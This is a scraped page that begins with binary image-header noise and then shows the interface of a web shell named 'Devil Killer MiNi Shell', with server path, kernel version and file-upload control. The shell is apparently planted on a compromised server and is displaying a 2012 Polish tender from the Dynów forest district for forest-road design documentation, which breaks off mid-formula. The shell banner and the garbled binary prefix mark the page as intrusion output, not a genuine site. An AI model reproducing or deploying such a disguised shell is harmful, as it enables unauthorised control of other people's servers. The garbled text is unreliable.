JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120403/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120403/75809-N-2012.html

<p class="kh_header"><b>Dynów: Wykonanie dokumentacji projektowej służącej do opisu przedmiotu zamówienia na wykonanie remontu dróg leśnych w Nadleśnictwie Dynów</b><br>
<b>Numer ogłoszenia: 75809 - 2012; data zamieszczenia: 03.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Lasy Państwowe Nadleśnictwo Dynów , ul. Jaklów 2, 36-065 Dynów, woj. podkarpackie, tel. 016 6521229 w. 20, faks 016 6521072.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.krosno.lasy.gov.pl/web/dynow</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: państwowa jednostka organizacyjna nieposiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowej służącej do opisu przedmiotu zamówienia na wykonanie remontu dróg leśnych w Nadleśnictwie Dynów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest: Wykonanie dokumentacji projektowej służącej do opisu przedmiotu zamówienia na wykonanie remontu dróg leśnych w Nadleśnictwie Dynów. Zamówienie podzielono na 5 części:
-  Część nr 1 Wykonanie dokumentacji projektowej na remont drogi leśnej Borownica-Brzeżawa nr. inw. 220/326 długości 1636 m, 
- Część nr 2 Wykonanie dokumentacji projektowej na remont drogi leśnej Borownica-Brzeżawa nr. inw. 220/327 długości 1000 m, 
- Część nr 3 Wykonanie dokumentacji projektowej na remont drogi leśnej Lipa-Żohatyn nr. inw. 242/173 długości 4 500 m, 
- Część nr 4 Wykonanie dokumentacji projektowej na remont drogi leśnej Huta Poręby-Borownica nr. inw. 242/128 długości 2 500 m, 
- Część nr 5 Wykonanie dokumentacji projektowej na remont drogi leśnej Iskań-Dylągowa nr. inw. 220/311 długości 2 235 m.
Szczegółowy opis przedmiotu zamówienia
1)	Dla części 1,2,3,4,5 należy opracować w wersji papierowej i elektronicznej kompletną   dokumentację projektową obejmującą:
a)	Projekt budowlany- uproszczony (4 egz.),
b)	Kosztorys inwestorski (1 egz.),
c)	Kosztorys - ślepy (1 egz.),
d)	Przedmiar robót ( 1 egz),
e)	Szczegółową specyfikację techniczną wykonania i odbioru robót( 1 egz.).
2)	W projekcie należy uwzględnić:
- mechaniczne wyprofilowanie istniejącej nawierzchni i poboczy przy użyciu równarki i walca,
- wypełnienie ubytków tłuczniem z mechanicznym zagęszczeniem,
- wykonanie nawierzchni z tłucznia kamiennego sortowanego z zagęszczeniem,
- oczyszczenie i pogłębienie rowów,
- oczyszczenie przepustów,
- wzmocnienie nawierzchni zjazdów na szlaki zrywkowe i składy drewna przy drodze,
- wzmocnienie składów drewna,
- montaż przepustów,
oraz innych niewymienionych robót niezbędnych do prawidłowego wykonania planowanej inwestycji. Zakres opracowań może ulec zmianie po dokonaniu szczegółowych obmiarów przez projektanta. Rozwiązania techniczne oraz zakres dokumentacji muszą być zaakceptowane przez Zamawiającego.
3)	Ponadto należy wykonać badania geotechniczne gruntu.
4)	W razie konieczności - aktualizacja kosztorysu inwestorskiego w okresie 3 lat od daty ich przekazania zamawiającemu. Wykonawca winien w cenie oferty zawrzeć koszt 1 aktualizacji dla zadań 1, 2, 3, 4, 5.
5)	Przy wykonywaniu prac Wykonawca winien uwzględnić obowiązujące w tym zakresie przepisy, a w szczególności:
- Rozporządzenie Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz.U. 2004 nr 202 poz. 2072),
- Rozporządzenie Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. z 2004 r. nr 130 poz. 1389),
- Rozporządzenie Ministra Infrastruktury z dnia 23 czerwca 2003 r. w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia (Dz.U. nr 120 poz. 1126 z późn. zm.),
- Ustawę z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2010 r. Nr 113 poz. 759 z późn. zm.)
- Ustawę z dnia 7 lipca 1994 r. Prawo budowlane( Dz. U. z 2010 r. Nr 234, poz. 1623 z późn. zm.),
6)	Wykonawca powinien zastosować w projekcie rozwiązania standardowe, skutkujące optymalizacją kosztów budowy i eksploatacji; rozwiązania koncepcyjne i architektoniczno-budowlane oraz specyfikacje techniczne wykonania i odbioru robót wymagają akceptacji Zamawiającego.
Ponadto winien zastosować w projekcie zalecenia zawarte w poradniku technicznym Drogi leśne  (Warszawa-Bedoń  2006) - dostępny na stronie internetowej:
http://www.lasy.gov.pl/dokumenty/drogi_lesne/at_download/file
7)	W dokumentacji projektowej zabrania się opisywania materiałów i urządzeń za pomocą znaków towarowych, patentów lub pochodzenia, chyba, że jest to uzasadnione specyfiką przedmiotu i Wykonawca nie może opisać przedmiotu zamówienia za pomocą dostatecznie dokładnych określeń, a wskazaniu takiemu towarzyszą wyrazy lub równoważny oraz należy podać minimalne parametry jakimi rozwiązanie winno się charakteryzować.
8)	W przypadkach, o których mowa pkt 7, Wykonawca sporządza szczegółowy opis, w jaki sposób równoważność może być zweryfikowana przez Zamawiającego.
9)	Wykonawca dostarczy wymagane dokumenty w wyżej wymienionej ilości egzemplarzy w formie papierowej oraz w formie elektronicznej na płytach CD (1 egzemplarz)  , w postaci plików ogólnodostępnych (formaty: .doc, .xls, .pdf; inne pliki po uzgodnieniu z Zamawiającym).
10)	Całość zamówienia Wykonawca zrealizuje z własnych materiałów, własnym staraniem i na własny koszt.
11)	Przed złożeniem ofert zaleca się dokładne zapoznanie z przedmiotem zamówienia, łącznie z lokalizacją planowanych obiektów na gruncie. Koszt wizji lokalnej ponosi Wykonawca.
12)	Udzielanie wyjaśnień w trakcie postępowania przetargowego, którego dotyczy opracowanie projektowe. Wyjaśnienia winny być udzielane tylko na pisemny wniosek Zamawiającego. Wykonawca nie może udzielać wyjaśnień bezpośrednio oferentom.
13)	Wykonawca jest zobowiązany udzielić na wykonaną dokumentację projektowo-kosztorysową gwarancji na okres minimum 24 miesięcy obejmującej również niekompletność opracowania lub rozwiązania projektu niezgodne z obowiązującymi przepisami i normami. Gwarancja liczona jest od dnia całkowitego końcowego odbioru dokumentacji projektowej. Okres gwarancji w przypadku wad ujawnionych ulega wydłużeniu o czas usunięcia wad..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.24.20.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie złożonego Oświadczenia o spełnieniu warunków udziału w postępowaniu -załącznik nr 2 do SIWZ
Ocena spełnienia powyższego warunku  dokonana zostanie w systemie spełnienia/nie spełnienia na podstawie załączonego przez Wykonawcę do oferty oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia powyższego warunku Wykonawcy przedstawią wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług   w zakresie niezbędnym do wskazania spełnienia warunku wiedzy i doświadczenia w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonanie co najmniej 1 projektu budowlanego, remontu drogi, o wartości minimum 5 000 zł brutto, z podaniem daty wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że usługa została wykonana lub jest wykonywana należycie. W przypadku składania oferty przez Wykonawców występujących wspólnie warunek mogą oni spełnić łącznie.Ocena spełnienia powyższego warunku  dokonana zostanie w systemie spełnienia/nie spełnienia na podstawie załączonych przez Wykonawcę do oferty dokumentów i oświadczeń.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie dysponowania odpowiednim potencjałem Zamawiający uzna warunek za spełniony na podstawie złożonego Oświadczenia o spełnieniu warunków udziału w postępowaniu - załącznik nr 2 do SIWZ.
Ocena spełnienia powyższego warunku  dokonana zostanie w systemie spełnienia/nie spełnienia na podstawie załączonego przez Wykonawcę do oferty oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże i udokumentuje, iż dysponuje lub będzie dysponował minimum jedną osobą posiadającą uprawnienia budowlane w specjalności drogowej lub inne ważne uprawnienia budowlane uprawniające do projektowania dróg w zakresie obejmującym przedmiot zamówienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów.
Dopuszcza się wykazanie spełnienia niniejszego warunku poprzez przedstawienie osób posiadających uprawnienia budowlane w specjalnościach inaczej nazwanych lecz wyłącznie takich, które uprawniają do wykonywania tych samych czynności, do których uprawniają uprawnienia budowlane w specjalnościach wymienionych w odpowiednich warunkach. 
Przez uprawnienia budowlane do projektowania rozumie się uprawnienia do sprawowania samodzielnych funkcji technicznych w budownictwie, wydane na podstawie ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2010 r. Nr 243 poz. 1623, ze zm.) oraz rozporządzenia ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. Nr 83, poz. 578), albo odpowiadające im inne ważne uprawnienia budowlane wydane na mocy wcześniej obowiązujących przepisów. 
W przypadku, gdy wskazane przez wykonawcę osoby są obywatelami państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej muszą one spełniać wymogi określone w art. 12 a ustawy z dnia 7 lipca 1994 r. - Prawo budowlane  (tj. Dz. U. z 2010 r. Nr 243 poz. 1623, ze zm.)
W celu potwierdzenia spełnienia warunku dysponowania odpowiednimi osobami, Wykonawca zobowiązany jest przedłożyć Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, sporządzony według propozycji Zamawiającego, stanowiący załącznik nr 3 do SIWZ oraz oświadczenie sporządzone według propozycji Zamawiającego, stanowiące załącznik nr 4 do SIWZ, że osoby które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia.
Ocena spełnienia powyższego warunku  dokonana zostanie w systemie spełnienia/nie spełnienia na podstawie załączonych przez Wykonawcę do oferty dokumentów i oświadczeń</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące sytuacji ekonomicznej i finansowej, poprzez posiadanie opłaconej polisy, na sumę nie niższą niż 5 000 zł brutto, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.
Ocena spełnienia powyższego warunku  dokonana zostanie w systemie spełnienia/nie spełnienia na podstawie załączonych przez Wykonawcę do oferty dokumentów i oświadczeń</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym oraz osobach zdolnych do wykonywania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go stosunków. Wykonawca  w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, przedstawiają w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia np. według wzoru - załącznik nr 7 do SIWZ). 
1)	Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia                                              powinni spełniać warunki udziału w postępowaniu oraz złożyć dokumenty potwierdzające spełnianie tych warunków, a także nie podlegać wykluczeniu z postępowania o udzielenie zamówienia oraz złożyć dokumenty potwierdzające brak podstaw do ich wykluczenia, zgodnie z zapisami zawartymi rozdziale XI ust. 1,2,3 niniejszej SIWZ:
a)	spełnienie warunków dotyczących posiadania wiedzy i doświadczenia oraz dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, a także sytuacji ekonomicznej i finansowej - oceniane będzie, ich łączne spełnienie przez członków konsorcjum,
b)	spełnienie warunków określonych w art. 24 ust. 1 ustawy pzp  - oceniane będzie ich spełnienie odrębnie przez każdego z członków konsorcjum.
2)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w niniejszym postępowaniu o udzielnie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 
3)	Pełnomocnictwo może być udzielone w szczególności
a)	łącznie przez wszystkich Wykonawców (jeden dokument),
b)	oddzielnie przez każdego z nich.
4)	Wszelka korespondencja prowadzona będzie wyłącznie z pełnomocnikiem.
5)	Wykonawcy wspólnie ubiegający się o niniejsze zamówienie, których oferta zostanie uznana za najkorzystniejszą, przed podpisaniem umowy o realizację zamówienia,                  są zobowiązani przedstawić Zamawiającemu umowę regulującą współpracę tych Wykonawców. 
6)	Wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy. 
7)	W przypadku wykonawców ubiegających się wspólnie o zamówienie do oferty musi być załączony dokument ustanawiający pełnomocnika do reprezentowania go w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2010 r. Nr 113 poz. 759 z  późn. zm.), Zamawiający dopuszcza możliwość wprowadzenia istotnych zmian zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w formie pisemnej pod rygorem nieważności jeżeli wystąpi co najmniej jedna lub kilka z wymienionych niżej okoliczności :   
1)	potrzeby zmiany terminu wykonania zamówienia spowodowanej:
a.	Jeżeli zajdzie konieczność wprowadzenia w dokumentacji projektowej, specyfikacjach technicznych wykonania i odbioru robót budowlanych albo w innych dokumentach zmian, wywołanych zmianami w przepisach prawa, norm i standardów albo zmianami w wiedzy technicznej;
b.	W wyniku odmowy wydania lub nieterminowego wydania przez organy administracji lub inne podmioty wymaganych decyzji, zezwoleń, uzgodnień lub postanowień z przyczyn niezawinionych przez Wykonawcę;
c.	W przypadku przedłużenia procedury udzielenia przedmiotowego zamówienia publicznego poprzez środki ochrony prawnej, wykorzystywane przez oferentów lub inne podmioty, a termin zakończenia przedmiotu umowy określony został datą;
d.	w następstwie okoliczności leżących po stronie Zamawiającego, w szczególności  w przypadku czasowego wstrzymania prac przez Zamawiającego;
e.	w przypadku wystąpienia konieczności wykonania robót dodatkowych, które mimo należytej staranności niebyły wcześniej do przewidzenia.
2)	W przypadku wystąpienia którejkolwiek z wymienionych okoliczności, termin realizacji zamówienia ulega odpowiedniemu wydłużeniu o czas niezbędny na należyte spełnienie świadczenia, nie dłużej jednak niż czas trwania tych okoliczności. 
2.	Pozostałe zmiany.
1) W przypadku zmiany stawki podatku od towarów i usług (VAT); ceny netto określone w ofercie i umowie pozostają niezmienne przez cały okres obowiązywania umowy. Jeżeli   w okresie obowiązywania umowy nastąpi zmiana stawki podatku od towarów i usług (VAT), od chwili zmiany podatek w nowej stawce będzie doliczany do dotychczasowych cen netto, bez konieczności zmiany umowy (nie dotyczy przypadków objęcia obowiązkiem podatkowym  w zakresie tego podatku Wykonawcy, który w dniu podpisania umowy nie był płatnikiem podatku VAT),
2) Rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy; zmiany mogą dotyczyć zakresu wykonywanych prac, zmian rodzaju i zakresu dokumentacji oraz zmniejszenia wynagrodzenia o kwoty odpowiadające cenie prac, z których Zamawiający rezygnuje; jeżeli pomimo prawidłowo wszczętego i prowadzonego postępowania przed organem administracji, nie jest możliwe uzyskanie dokumentów niezbędnych do dalszej realizacji umowy;
3) Zmiana lokalizacji projektowanych obiektów; jeżeli konieczność taka wynikać będzie z przyczyn technicznych, ekonomicznych lub prawnych, w szczególności na podstawie wyników badań geologicznych i geotechnicznych, obliczeń hydrologicznych albo zaleceń organów opiniujących, zezwalających, kontrolujących albo innych uprawnionych organów.
4. Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy pzp:
1)	Zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana nr rachunku bankowego);
2)	Zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów między stronami;
5. Wszystkie powyższe postanowienia stanowią katalog zmian, na które Strony mogą wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.
6. Zmiany umowy są skuteczne jeżeli zostaną wprowadzone z zachowaniem formy pisemnej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_krosno/nadl_dynow/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwie  Dynów  ul. Jaklów 2, 36-065 Dynów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.04.2012 godzina 08:00, miejsce: Nadleśnictwie  Dynów  ul. Jaklów 2, 36-065 Dynów, pokój nr 7.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> OPIS KRYTERIÓW, KTÓRYMI ZAMAWIAJĄCY BĘDZIE SIĘ KIEROWAŁ PRZY WYBORZE OFERTY, WRAZ Z PODANIEM ZNACZENIA TYCH KRYTERIÓW I SPOSOBU OCENY OFERT
1.	Oferty zostaną ocenione przez Zamawiającego w oparciu o kryterium ceny (C) - waga kryterium 100%.  Oferta może otrzymać maksymalnie 100 punktów.
2.	Zasady oceny dla kryterium cena (C). Oferta otrzyma zaokrągloną do dwóch miejsc po przecinku ilość punktów wynikającą z działania:
Pi (C) = (Cn / Co) x 100 pkt
gdzie:
Pi (C) - przyznane punkty kryterium cena;
